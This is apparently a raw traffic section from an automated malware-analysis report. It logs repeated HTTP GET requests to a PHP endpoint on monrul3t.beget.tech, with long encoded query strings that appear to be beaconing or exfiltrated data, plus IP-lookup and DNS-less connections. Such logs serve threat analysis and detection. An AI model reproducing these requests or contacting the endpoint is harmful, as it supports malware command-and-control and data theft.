UDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMul0dJp2T3VlaPdXQqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOlXRqp1dJNETpV1QNl2bql0aaR0TtJkaZJTRqlFaGdVTsZEVPFTSykFbWpWTshGRNdXRq5UMjpXWsJEVZBTRX9UaK1mWyk0QMlWVD10dFpWS2k0QNFTUU1kMZRkTyUEVPtmU610dJ1mW6llaaBzZU5ENRd1TqZkaaBTQUlFaa1mTsZlaORTV61Ua3lWSvkUaPlWUql1MV1WWqZ1VNpmV61kMBpnTrxGVNpmSH9UbSdkTyklMNhXTUpVeVRVTzkFVNRTWH90MnpWSzlUeQl2bql0dnRkWxE1RadXRE1UeVR0T1UlMZhmUy4UbCRlW0U1VZhXRy00MNpmT0kVbOBzaU10akRUT4l0QMlWTYJ2ZBRkTp9maJRzZU5Uaa1WTw0kaZpmVX10MJJTT5F1RaJTRyk1aGpmTsJlMOxmUtpVaO1mTsJkeO1mUql1aKlXZ2k0UZBjRHJFMohlWpd3UOZTSDRWM5clW0x2RWdnVXp1cOxWSzlUeaVHbHNGbWdkYUpUaPlWTYRGMGdEZUxGSkBnWYFGMOdVUpdXaJlnVyoFa1cVWOJ0UihmSzoldKhUVp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ipinfo.ioConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?md25=UA&vb=r948xSj667Ud7PLnWmgd&60bc32dfe02b37c4e360dca40128d82d=989faea0cce1115f683b114ca580d3df&9d38ba4b7300523a983f9d7476ad101b=QYlZ2YlVWOiVTYjF2N3MjNjFDNyMjYwEDZ3I2YmdjZzUmNidjY5ETZ&md25=UA&vb=r948xSj667Ud7PLnWmgd HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nIkJWYmZWM1cTNkRzMhVzMiVWY0MzYwITOjFjNyUGO1kjZwgjMkhTYxIiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nIklzY3IWN4IDNlVWO4MWO4MzY2YWMhdTO4YGN5czMwQGMwUDOjZ2YxIiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&c9ac4e72985eee3d90507dfb878ca2be=0VfiIiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIzMDNhdTO3MmYxIjMmJDOwIDO0MWO3YmZwE2YxQjZzETMjhDO3YmYhJiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&12c459a86df5a98a63f3de23b4087211=QX9JCMulUNKhlWykjMZxmSGh1YwpXUp9maJ9mUYlVUKNETpRjMkZXNyEWdWxWS2k0QhBjRHV1aKNjYq5EWhVkSDxUaJl2Tpd2RkhmQWJGaKNjWsh3VaVlSDxUaJl2Tp1ESjdnRVJGaWdEZUp0QMlGNyQmd1ITY1ZFbJZTSDJlSKhlW6ZlVihmVHRGVKNETpRjMkZXNyEWdWxWS2kUajxmTYZFdGdlWw4EbJNXSpJ2M50mYyVzVWl2bqlkb1cVWNFzVZxmUzUVa3lWS1R2MiVHdtJmVKl2Tpd2RkhmQWJGaWdEZUp0QMlWRt5UaGdFT3dmaOJTWE50dJJTZ1BDSNdXQE10dBRUT3RzUNVXQqx0dz5WS2kUejxWNyI2bCNjY550Vh5kSDxUaJl2Tp1EWihmTtlFbkxWSzlUaiNmSIhFerZVUNJUMVpkUFh1Y1MEWjhnRYl2bqlke1clWsp0MZRlSDxUa0IDZ2VjMhVnVslkNJNUVKVTVR1kSDxUaJBjUnFlaJZTSTRlQKxWSzlUaiNTOtJmc1clVp9maJNHeXl1MW12Ywp1aJNXSpNGbS1mYsp1VaVkQ5N2M5ckW1xmMWl2bqlkeW52YwpFWhBTNXFVa3lWSVZkaNdlWrlkNJlmY2xmMjlnVtZFV5U1UDp0QMlWSE5ENFRVT5VEVNlXSqxEMZpWU1FlaNl3aq1ENBpWT1llRNdHNT10dJpnVOpFbJZTSTpFdG1GVUlTVTNkSDxUaRRlT4VkeORzY61kMrRVTwsG